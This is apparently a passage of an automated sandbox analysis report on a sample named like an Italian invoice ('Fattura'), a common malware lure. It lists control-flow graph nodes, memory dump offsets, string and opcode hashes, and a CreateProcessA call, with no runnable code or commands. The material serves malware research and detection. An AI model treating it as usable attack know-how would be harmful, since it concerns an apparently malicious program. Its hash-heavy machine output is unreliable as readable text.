                                                                                control_flow_graph 169 76d0cf8-76d0d1e 170 76d0ebf-76d0f0d 169->170 171 76d0d24-76d0d29 169->171 179 76d1085-76d10d6 170->179 180 76d0f13-76d0f18 170->180 172 76d0d2b-76d0d31 171->172 173 76d0d41-76d0d45 171->173 174 76d0d35-76d0d3f 172->174 175 76d0d33 172->175 177 76d0e6b-76d0e75 173->177 178 76d0d4b-76d0d4d 173->178 174->173 175->173 181 76d0e77-76d0e80 177->181 182 76d0e83-76d0e89 177->182 183 76d0d5d 178->183 184 76d0d4f-76d0d5b 178->184 185 76d0f1a-76d0f20 180->185 186 76d0f30-76d0f3c 180->186 189 76d0e8f-76d0e9b 182->189 190 76d0e8b-76d0e8d 182->190 188 76d0d5f-76d0d61 183->188 184->188 191 76d0f24-76d0f2e 185->191 192 76d0f22 185->192 199 76d1032-76d103c 186->199 200 76d0f42-76d0f45 186->200 188->177 194 76d0d67-76d0d86 188->194 195 76d0e9d-76d0ebc 189->195 190->195 191->186 192->186 213 76d0d88-76d0d94 194->213 214 76d0d96 194->214 205 76d103e-76d1047 199->205 206 76d104a-76d1050 199->206 200->199 204 76d0f4b-76d0f52 200->204 204->179 209 76d0f58-76d0f5d 204->209 211 76d1056-76d1062 206->211 212 76d1052-76d1054 206->212 215 76d0f5f-76d0f65 209->215 216 76d0f75-76d0f79 209->216 217 76d1064-76d1082 211->217 212->217 218 76d0d98-76d0d9a 213->218 214->218 219 76d0f69-76d0f73 215->219 220 76d0f67 215->220 216->199 222 76d0f7f-76d0f81 216->222 218->177 224 76d0da0-76d0da2 218->224 219->216 220->216 225 76d0f91 222->225 226 76d0f83-76d0f8f 222->226 224->177 228 76d0da8-76d0dac 224->228 230 76d0f93-76d0f95 225->230 226->230 228->177 232 76d0db2-76d0dd1 228->232 230->199 233 76d0f9b-76d0f9d 230->233 247 76d0de9-76d0df0 232->247 248 76d0dd3-76d0dd9 232->248 234 76d0f9f-76d0fa5 233->234 235 76d0fb7-76d0fc0 233->235 236 76d0fa9-76d0fb5 234->236 237 76d0fa7 234->237 240 76d0fd8-76d102f 235->240 241 76d0fc2-76d0fc8 235->241 236->235 237->235 244 76d0fcc-76d0fce 241->244 245 76d0fca 241->245 244->240 245->240 251 76d0df7-76d0df9 247->251 249 76d0ddd-76d0ddf 248->249 250 76d0ddb 248->250 249->247 250->247 252 76d0dfb-76d0e01 251->252 253 76d0e11-76d0e68 251->253 254 76d0e05-76d0e07 252->254 255 76d0e03 252->255 254->253 255->253
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                • API String ID: 0-4104424984
                                                                                • Opcode ID: e988cb0635717847c31d050a1d122e25cf6e259001131551935d324e89bda284
                                                                                • Instruction ID: 4d0dd141af0ac374625fb8a3eed4ac3fb1819aececc2680f1bfc951ec1723762
                                                                                • Opcode Fuzzy Hash: e988cb0635717847c31d050a1d122e25cf6e259001131551935d324e89bda284
                                                                                • Instruction Fuzzy Hash: 83912AB1F2434A9FDB259B3594507AAB7A1EF86210F28807BD807CB351DB31DD46C7A2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 257 76d1425-76d1428 258 76d142e-76d1436 257->258 259 76d142a-76d142c 257->259 260 76d144e-76d1452 258->260 261 76d1438-76d143e 258->261 259->258 264 76d1458-76d145c 260->264 265 76d1656-76d1660 260->265 262 76d1440 261->262 263 76d1442-76d144c 261->263 262->260 263->260 268 76d146f 264->268 269 76d145e-76d146d 264->269 266 76d166e-76d1674 265->266 267 76d1662-76d166b 265->267 270 76d167a-76d1686 266->270 271 76d1676-76d1678 266->271 273 76d1471-76d1473 268->273 269->273 275 76d1688-76d16a6 270->275 271->275 273->265 274 76d1479-76d1499 273->274 281 76d14b8 274->281 282 76d149b-76d14b6 274->282 283 76d14ba-76d14bc 281->283 282->283 283->265 285 76d14c2-76d14c4 283->285 286 76d14d4 285->286 287 76d14c6-76d14d2 285->287 289 76d14d6-76d14d8 286->289 287->289 289->265 290 76d14de-76d14fd 289->290 293 76d151c 290->293 294 76d14ff-76d151a 290->294 295 76d151e-76d1520 293->295 294->295 295->265 297 76d1526-76d1548 295->297 301 76d154a-76d1550 297->301 302 76d1560-76d15c5 297->302 303 76d1554-76d1556 301->303 304 76d1552 301->304 308 76d15dd-76d15e1 302->308 309 76d15c7-76d15cd 302->309 303->302 304->302 312 76d15e8-76d15f2 308->312 310 76d15cf 309->310 311 76d15d1-76d15d3 309->311 310->308 311->308 313 76d15f9-76d1647 312->313 314 76d15f4-76d15f7 312->314 315 76d164c-76d1653 313->315 314->315
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq$XXq$XXq$XXq$XXq
                                                                                • API String ID: 0-1928333455
                                                                                • Opcode ID: 81daa37ec5750d04da7d7e2cad04c226cd140dc076f97c42fcd2b6317ae0053f
                                                                                • Instruction ID: e997557082727a57ab0de872b633b6398e6789fb5a7537ef88154fb9dacae8fe
                                                                                • Opcode Fuzzy Hash: 81daa37ec5750d04da7d7e2cad04c226cd140dc076f97c42fcd2b6317ae0053f
                                                                                • Instruction Fuzzy Hash: 0B5157F1F2424A9BEB285A7898147BAB3929FC7200F194036D5079F392EFB5CC46C761

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 322 76d0cd8-76d0d1e 324 76d0ebf-76d0f0d 322->324 325 76d0d24-76d0d29 322->325 333 76d1085-76d10d6 324->333 334 76d0f13-76d0f18 324->334 326 76d0d2b-76d0d31 325->326 327 76d0d41-76d0d45 325->327 328 76d0d35-76d0d3f 326->328 329 76d0d33 326->329 331 76d0e6b-76d0e75 327->331 332 76d0d4b-76d0d4d 327->332 328->327 329->327 335 76d0e77-76d0e80 331->335 336 76d0e83-76d0e89 331->336 337 76d0d5d 332->337 338 76d0d4f-76d0d5b 332->338 339 76d0f1a-76d0f20 334->339 340 76d0f30-76d0f3c 334->340 343 76d0e8f-76d0e9b 336->343 344 76d0e8b-76d0e8d 336->344 342 76d0d5f-76d0d61 337->342 338->342 345 76d0f24-76d0f2e 339->345 346 76d0f22 339->346 353 76d1032-76d103c 340->353 354 76d0f42-76d0f45 340->354 342->331 348 76d0d67-76d0d86 342->348 349 76d0e9d-76d0ebc 343->349 344->349 345->340 346->340 367 76d0d88-76d0d94 348->367 368 76d0d96 348->368 359 76d103e-76d1047 353->359 360 76d104a-76d1050 353->360 354->353 358 76d0f4b-76d0f52 354->358 358->333 363 76d0f58-76d0f5d 358->363 365 76d1056-76d1062 360->365 366 76d1052-76d1054 360->366 369 76d0f5f-76d0f65 363->369 370 76d0f75-76d0f79 363->370 371 76d1064-76d1082 365->371 366->371 372 76d0d98-76d0d9a 367->372 368->372 373 76d0f69-76d0f73 369->373 374 76d0f67 369->374 370->353 376 76d0f7f-76d0f81 370->376 372->331 378 76d0da0-76d0da2 372->378 373->370 374->370 379 76d0f91 376->379 380 76d0f83-76d0f8f 376->380 378->331 382 76d0da8-76d0dac 378->382 384 76d0f93-76d0f95 379->384 380->384 382->331 386 76d0db2-76d0dd1 382->386 384->353 387 76d0f9b-76d0f9d 384->387 401 76d0de9-76d0df0 386->401 402 76d0dd3-76d0dd9 386->402 388 76d0f9f-76d0fa5 387->388 389 76d0fb7-76d0fc0 387->389 390 76d0fa9-76d0fb5 388->390 391 76d0fa7 388->391 394 76d0fd8-76d102f 389->394 395 76d0fc2-76d0fc8 389->395 390->389 391->389 398 76d0fcc-76d0fce 395->398 399 76d0fca 395->399 398->394 399->394 405 76d0df7-76d0df9 401->405 403 76d0ddd-76d0ddf 402->403 404 76d0ddb 402->404 403->401 404->401 406 76d0dfb-76d0e01 405->406 407 76d0e11-76d0e68 405->407 408 76d0e05-76d0e07 406->408 409 76d0e03 406->409 408->407 409->407
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$$q$$q
                                                                                • API String ID: 0-3789935075
                                                                                • Opcode ID: e52b58ef58f91768bbcd0e11eb4505b6c2fd8f6868aea46d1fb6fa9ae88486c0
                                                                                • Instruction ID: 2f9f96aafb0d650a945de6ff6e959e7f1ece4536a38f3571406b18d41f0d75f9
                                                                                • Opcode Fuzzy Hash: e52b58ef58f91768bbcd0e11eb4505b6c2fd8f6868aea46d1fb6fa9ae88486c0
                                                                                • Instruction Fuzzy Hash: 773104B4E2434AAFDB258F3498607BABBB19F4A210F144467D806CB352D735DD81CBB2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 411 76d05b4-76d05ee 412 76d073b-76d075c 411->412 413 76d05f4-76d05f9 411->413 423 76d078c 412->423 424 76d075e-76d076d 412->424 414 76d05fb-76d0601 413->414 415 76d0611-76d0615 413->415 416 76d0605-76d060f 414->416 417 76d0603 414->417 418 76d061b-76d061d 415->418 419 76d06e7-76d06f1 415->419 416->415 417->415 421 76d062d 418->421 422 76d061f-76d062b 418->422 425 76d06ff-76d0705 419->425 426 76d06f3-76d06fc 419->426 428 76d062f-76d0631 421->428 422->428 433 76d081d-76d0822 423->433 434 76d0792-76d0798 423->434 429 76d076f-76d0785 424->429 430 76d07ce-76d07d8 424->430 431 76d070b-76d0717 425->431 432 76d0707-76d0709 425->432 428->419 437 76d0637-76d0639 428->437 429->423 435 76d07da-76d07de 430->435 436 76d07e1-76d07e7 430->436 438 76d0719-76d0738 431->438 432->438 433->434 439 76d079c-76d07a8 434->439 440 76d079a 434->440 442 76d07ed-76d07f9 436->442 443 76d07e9-76d07eb 436->443 437->419 444 76d063f-76d0643 437->444 447 76d07aa-76d07c8 439->447 440->447 450 76d07fb-76d081a 442->450 443->450 444->419 451 76d0649-76d064b 444->451 447->430 454 76d064d-76d0653 451->454 455 76d0665-76d066c 451->455 457 76d0655 454->457 458 76d0657-76d0663 454->458 460 76d0673-76d0675 455->460 457->455 458->455 461 76d068d-76d06e4 460->461 462 76d0677-76d067d 460->462 465 76d067f 462->465 466 76d0681-76d0683 462->466 465->461 466->461
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$$q$$q
                                                                                • API String ID: 0-3789935075
                                                                                • Opcode ID: f0467ec15bfe223acedd3abeb917d47b4cda8c758cff8afa6a8f2200b193075e
                                                                                • Instruction ID: 12d30331bebc717ba0a35af69ff2ad6d9d53d373a564252b603273bc44c98eac
                                                                                • Opcode Fuzzy Hash: f0467ec15bfe223acedd3abeb917d47b4cda8c758cff8afa6a8f2200b193075e
                                                                                • Instruction Fuzzy Hash: 3421A2F4F24386DFDB208EA5D8407AABBB1ABC5214F258067D806A7341D731CD51CBA2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 468 76d05c8-76d05ee 469 76d073b-76d075c 468->469 470 76d05f4-76d05f9 468->470 480 76d078c 469->480 481 76d075e-76d076d 469->481 471 76d05fb-76d0601 470->471 472 76d0611-76d0615 470->472 473 76d0605-76d060f 471->473 474 76d0603 471->474 475 76d061b-76d061d 472->475 476 76d06e7-76d06f1 472->476 473->472 474->472 478 76d062d 475->478 479 76d061f-76d062b 475->479 482 76d06ff-76d0705 476->482 483 76d06f3-76d06fc 476->483 485 76d062f-76d0631 478->485 479->485 490 76d081d-76d0822 480->490 491 76d0792-76d0798 480->491 486 76d076f-76d0785 481->486 487 76d07ce-76d07d8 481->487 488 76d070b-76d0717 482->488 489 76d0707-76d0709 482->489 485->476 494 76d0637-76d0639 485->494 486->480 492 76d07da-76d07de 487->492 493 76d07e1-76d07e7 487->493 495 76d0719-76d0738 488->495 489->495 490->491 496 76d079c-76d07a8 491->496 497 76d079a 491->497 499 76d07ed-76d07f9 493->499 500 76d07e9-76d07eb 493->500 494->476 501 76d063f-76d0643 494->501 504 76d07aa-76d07c8 496->504 497->504 507 76d07fb-76d081a 499->507 500->507 501->476 508 76d0649-76d064b 501->508 504->487 511 76d064d-76d0653 508->511 512 76d0665-76d066c 508->512 514 76d0655 511->514 515 76d0657-76d0663 511->515 517 76d0673-76d0675 512->517 514->512 515->512 518 76d068d-76d06e4 517->518 519 76d0677-76d067d 517->519 522 76d067f 519->522 523 76d0681-76d0683 519->523 522->518 523->518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$$q$$q
                                                                                • API String ID: 0-3789935075
                                                                                • Opcode ID: 372cd771818fd00e1e8325c6f2212140c99f09c0094216b13d21d7a3f2b0b908
                                                                                • Instruction ID: 05d266675425103559ad1d75173286ded143e5ff58a06a0308999d419177da8b
                                                                                • Opcode Fuzzy Hash: 372cd771818fd00e1e8325c6f2212140c99f09c0094216b13d21d7a3f2b0b908
                                                                                • Instruction Fuzzy Hash: F1118FF4F2438ADBDB248EA5D94476ABBB4ABC5210F15806AD806A7341E732CC51CAA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: bed5a651a8a75c3ac1b944a6a629fd548d6b2b9db74bd793a6d60d83c08ba338
                                                                                • Instruction ID: 6a03006f9c661d7fdeb5eb07492bbf3ca1d4d01b8575550caa6b7c5a9697b41c
                                                                                • Opcode Fuzzy Hash: bed5a651a8a75c3ac1b944a6a629fd548d6b2b9db74bd793a6d60d83c08ba338
                                                                                • Instruction Fuzzy Hash: 7542E4B8E2525ADFDB14DFA9D494AADBBB2FF89300F108019D916AB394CB345D42CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 859 76d52e0-76d5308 860 76d530f-76d5338 859->860 861 76d530a 859->861 863 76d5359 860->863 864 76d533a-76d5343 860->864 861->860 867 76d535c-76d5360 863->867 865 76d534a-76d534d 864->865 866 76d5345-76d5348 864->866 868 76d5357 865->868 866->868 869 76d5717-76d572e 867->869 868->867 871 76d5365-76d5369 869->871 872 76d5734-76d5738 869->872 875 76d536e-76d5372 871->875 876 76d536b-76d53c8 871->876 873 76d576d-76d5771 872->873 874 76d573a-76d576a 872->874 880 76d5773-76d577c 873->880 881 76d5792 873->881 874->873 878 76d539b-76d539e 875->878 879 76d5374-76d5398 875->879 884 76d53cd-76d53d1 876->884 885 76d53ca-76d543b 876->885 889 76d53a6-76d53bf 878->889 879->878 886 76d577e-76d5781 880->886 887 76d5783-76d5786 880->887 882 76d5795-76d579b 881->882 891 76d53fa-76d5421 884->891 892 76d53d3-76d53f7 884->892 895 76d543d-76d549a 885->895 896 76d5440-76d5444 885->896 888 76d5790 886->888 887->888 888->882 889->869 915 76d5431-76d5432 891->915 916 76d5423-76d5429 891->916 892->891 904 76d549c-76d54f8 895->904 905 76d549f-76d54a3 895->905 901 76d546d-76d5491 896->901 902 76d5446-76d546a 896->902 901->869 902->901 917 76d54fd-76d5501 904->917 918 76d54fa-76d555c 904->918 913 76d54cc-76d54ef 905->913 914 76d54a5-76d54c9 905->914 913->869 914->913 915->869 916->915 924 76d552a-76d5542 917->924 925 76d5503-76d5527 917->925 927 76d555e-76d55c0 918->927 928 76d5561-76d5565 918->928 937 76d5544-76d554a 924->937 938 76d5552-76d5553 924->938 925->924 939 76d55c5-76d55c9 927->939 940 76d55c2-76d5624 927->940 934 76d558e-76d55a6 928->934 935 76d5567-76d558b 928->935 948 76d55a8-76d55ae 934->948 949 76d55b6-76d55b7 934->949 935->934 937->938 938->869 945 76d55cb-76d55ef 939->945 946 76d55f2-76d560a 939->946 950 76d5629-76d562d 940->950 951 76d5626-76d5688 940->951 945->946 959 76d560c-76d5612 946->959 960 76d561a-76d561b 946->960 948->949 949->869 956 76d562f-76d5653 950->956 957 76d5656-76d566e 950->957 961 76d568d-76d5691 951->961 962 76d568a-76d56e3 951->962 956->957 970 76d567e-76d567f 957->970 971 76d5670-76d5676 957->971 959->960 960->869 967 76d56ba-76d56dd 961->967 968 76d5693-76d56b7 961->968 972 76d570c-76d570f 962->972 973 76d56e5-76d5709 962->973 967->869 968->967 970->869 971->970 972->869 973->972
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: e212b71683ef623ba7a6eb3b5acdf17e1116578417f830f0fa4c2a0694e0ca3d
                                                                                • Instruction ID: 5994b878ac78375a3911f78425518e2d35525d18b7dda622b9a530775417c4c7
                                                                                • Opcode Fuzzy Hash: e212b71683ef623ba7a6eb3b5acdf17e1116578417f830f0fa4c2a0694e0ca3d
                                                                                • Instruction Fuzzy Hash: 07F1D2B4E11209DFDB18DFA8E4986ACBBB2FF49311F204069E40AA7751DB355D92CF40

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 985 76d4fb8-76d4fdd 987 76d4fdf 985->987 988 76d4fe4-76d5001 985->988 987->988 989 76d5003-76d500c 988->989 990 76d5022 988->990 992 76d500e-76d5011 989->992 993 76d5013-76d5016 989->993 991 76d5025-76d5029 990->991 994 76d5244-76d525b 991->994 995 76d5020 992->995 993->995 997 76d502e-76d5032 994->997 998 76d5261-76d5265 994->998 995->991 999 76d503a-76d503e 997->999 1000 76d5034-76d50d2 997->1000 1001 76d528f-76d5293 998->1001 1002 76d5267-76d528c 998->1002 1006 76d5068-76d508d 999->1006 1007 76d5040-76d504d 999->1007 1011 76d50da-76d50de 1000->1011 1012 76d50d4-76d5172 1000->1012 1003 76d5295-76d529e 1001->1003 1004 76d52b4 1001->1004 1002->1001 1008 76d52a5-76d52a8 1003->1008 1009 76d52a0-76d52a3 1003->1009 1010 76d52b7-76d52bd 1004->1010 1032 76d508f-76d5098 1006->1032 1033 76d50ae 1006->1033 1029 76d5056-76d5065 1007->1029 1017 76d52b2 1008->1017 1009->1017 1014 76d5108-76d512d 1011->1014 1015 76d50e0-76d5105 1011->1015 1021 76d517a-76d517e 1012->1021 1022 76d5174-76d520f 1012->1022 1047 76d512f-76d5138 1014->1047 1048 76d514e 1014->1048 1015->1014 1017->1010 1026 76d51a8-76d51cd 1021->1026 1027 76d5180-76d51a5 1021->1027 1030 76d5239-76d523c 1022->1030 1031 76d5211-76d5236 1022->1031 1058 76d51cf-76d51d8 1026->1058 1059 76d51ee 1026->1059 1027->1026 1029->1006 1030->994 1031->1030 1037 76d509f-76d50a2 1032->1037 1038 76d509a-76d509d 1032->1038 1039 76d50b1-76d50b8 1033->1039 1044 76d50ac 1037->1044 1038->1044 1045 76d50c8-76d50c9 1039->1045 1046 76d50ba-76d50c0 1039->1046 1044->1039 1045->994 1046->1045 1053 76d513f-76d5142 1047->1053 1054 76d513a-76d513d 1047->1054 1049 76d5151-76d5158 1048->1049 1055 76d5168-76d5169 1049->1055 1056 76d515a-76d5160 1049->1056 1060 76d514c 1053->1060 1054->1060 1055->994 1056->1055 1061 76d51df-76d51e2 1058->1061 1062 76d51da-76d51dd 1058->1062 1063 76d51f1-76d51f8 1059->1063 1060->1049 1066 76d51ec 1061->1066 1062->1066 1067 76d5208-76d5209 1063->1067 1068 76d51fa-76d5200 1063->1068 1066->1063 1067->994 1068->1067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 193b36528bc4d096ae249a9eab4413494bca50be9678a2264d7bae0ae15297a3
                                                                                • Instruction ID: e872134568b43013e8e3d40e8d954e6f8b0a86ba08c57ce847f6c143d291a7fb
                                                                                • Opcode Fuzzy Hash: 193b36528bc4d096ae249a9eab4413494bca50be9678a2264d7bae0ae15297a3
                                                                                • Instruction Fuzzy Hash: 82A102B4E1120ACFDB18DFA9D848AADBBB2BF49311F108029D807A7755DB345D52CF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1164 76d1e63-76d1e68 1165 76d1e6e-76d1e76 1164->1165 1166 76d1e6a-76d1e6c 1164->1166 1167 76d1e8e-76d1e92 1165->1167 1168 76d1e78-76d1e7e 1165->1168 1166->1165 1169 76d1f69-76d1f73 1167->1169 1170 76d1e98-76d1e9a 1167->1170 1171 76d1e80 1168->1171 1172 76d1e82-76d1e8c 1168->1172 1174 76d1f75-76d1f7e 1169->1174 1175 76d1f81-76d1f87 1169->1175 1170->1169 1173 76d1ea0-76d1ea4 1170->1173 1171->1167 1172->1167 1176 76d1ec4 1173->1176 1177 76d1ea6-76d1ec2 1173->1177 1178 76d1f8d-76d1f99 1175->1178 1179 76d1f89-76d1f8b 1175->1179 1181 76d1ec6-76d1ec8 1176->1181 1177->1181 1182 76d1f9b-76d1fb9 1178->1182 1179->1182 1181->1169 1184 76d1ece-76d1ed7 1181->1184 1184->1169 1190 76d1edd-76d1ef0 1184->1190 1192 76d1ef5-76d1ef7 1190->1192 1193 76d1f0f-76d1f66 1192->1193 1194 76d1ef9-76d1eff 1192->1194 1195 76d1f01 1194->1195 1196 76d1f03-76d1f05 1194->1196 1195->1193 1196->1193
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: fd9f90e8b0073eaade7315ca1c049d33beac992d20d24d99ad0bfe62781b6176
                                                                                • Instruction ID: c66a54a772d5467ac20c01469cbfbc779eee42e7682a31dcd60a8effd96c46f1
                                                                                • Opcode Fuzzy Hash: fd9f90e8b0073eaade7315ca1c049d33beac992d20d24d99ad0bfe62781b6176
                                                                                • Instruction Fuzzy Hash: 733102B1F1420E8FDB289A75D4502FABBE2EFC7211B1984AAD5478B351DB71CC42C7A1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1198 76d284c-76d284f 1199 76d2855-76d285d 1198->1199 1200 76d2851-76d2853 1198->1200 1201 76d285f-76d2865 1199->1201 1202 76d2875-76d2879 1199->1202 1200->1199 1203 76d2869-76d2873 1201->1203 1204 76d2867 1201->1204 1205 76d292d-76d2937 1202->1205 1206 76d287f-76d2881 1202->1206 1203->1202 1204->1202 1207 76d2939-76d2941 1205->1207 1208 76d2944-76d294a 1205->1208 1209 76d2891 1206->1209 1210 76d2883-76d288f 1206->1210 1213 76d294c-76d294e 1208->1213 1214 76d2950-76d295c 1208->1214 1212 76d2893-76d2895 1209->1212 1210->1212 1212->1205 1215 76d289b-76d289d 1212->1215 1216 76d295e-76d2978 1213->1216 1214->1216 1217 76d289f-76d28a5 1215->1217 1218 76d28b7-76d28cb 1215->1218 1220 76d28a9-76d28b5 1217->1220 1221 76d28a7 1217->1221 1226 76d28d1-76d292a 1218->1226 1220->1218 1221->1218
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p<q$p<q
                                                                                • API String ID: 0-3560197191
                                                                                • Opcode ID: ee85073bdbe0b5a825da600ee7a5b13a27929abfd862feb40dceeee20251bd69
                                                                                • Instruction ID: aa127c01a4df2004e79e0d2b925071be8fbe082a8ee7452f41af2749591d83ab
                                                                                • Opcode Fuzzy Hash: ee85073bdbe0b5a825da600ee7a5b13a27929abfd862feb40dceeee20251bd69
                                                                                • Instruction Fuzzy Hash: 1C21F8B6F242178FD725867A84202B6B7A2BFC9121B14407BC457CB354DB31CC57C7A2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1228 76d1564-76d15c5 1235 76d15dd-76d15e1 1228->1235 1236 76d15c7-76d15cd 1228->1236 1239 76d15e8-76d15f2 1235->1239 1237 76d15cf 1236->1237 1238 76d15d1-76d15d3 1236->1238 1237->1235 1238->1235 1240 76d15f9-76d1647 1239->1240 1241 76d15f4-76d15f7 1239->1241 1242 76d164c-76d1653 1240->1242 1241->1242
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: XXq$XXq
                                                                                • API String ID: 0-2437993854
                                                                                • Opcode ID: a16ebb48899cd44afadd9a0b7b77850aa90b8e4249e5492c00a760c5999450cf
                                                                                • Instruction ID: 629add793b058b1c80a8f50e3e0d0e716a7ea7f622dccdc9c24a8df9c80cfd75
                                                                                • Opcode Fuzzy Hash: a16ebb48899cd44afadd9a0b7b77850aa90b8e4249e5492c00a760c5999450cf
                                                                                • Instruction Fuzzy Hash: A301D8B1A1014CDBEB149B58E400B9DF7A2EBCA314B118166E90A5B741CF71DC02CB61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$"
                                                                                • API String ID: 0-3796260231
                                                                                • Opcode ID: 5e0f56f0f51ca8bf34c17a9af52e519b4442bebc320dc0ef92f06b7806e73688
                                                                                • Instruction ID: 96d359f00a416e1369977a8804654a94537a0589ab39e18090f485b10ded7862
                                                                                • Opcode Fuzzy Hash: 5e0f56f0f51ca8bf34c17a9af52e519b4442bebc320dc0ef92f06b7806e73688
                                                                                • Instruction Fuzzy Hash: A7F0A974A04118CFD7288B68C888BD87BF0EF0A305F0000E4E218A3A42CB380EC6CF11
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A035ED7
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 6ae971a8ae0bf4e90cc77a79751be01423cc0b0982f142063d53641ff7ec5c01
                                                                                • Instruction ID: 32c8190f35774a68a4bb56f415ae629ffb52d9d502659bbaef77aa31fb68febc
                                                                                • Opcode Fuzzy Hash: 6ae971a8ae0bf4e90cc77a79751be01423cc0b0982f142063d53641ff7ec5c01
                                                                                • Instruction Fuzzy Hash: 8BA11075D0021C8FDB64CFA9C885BEEBBF1BF09300F14916AE858A7290DB749985CF85
                                                                                APIs
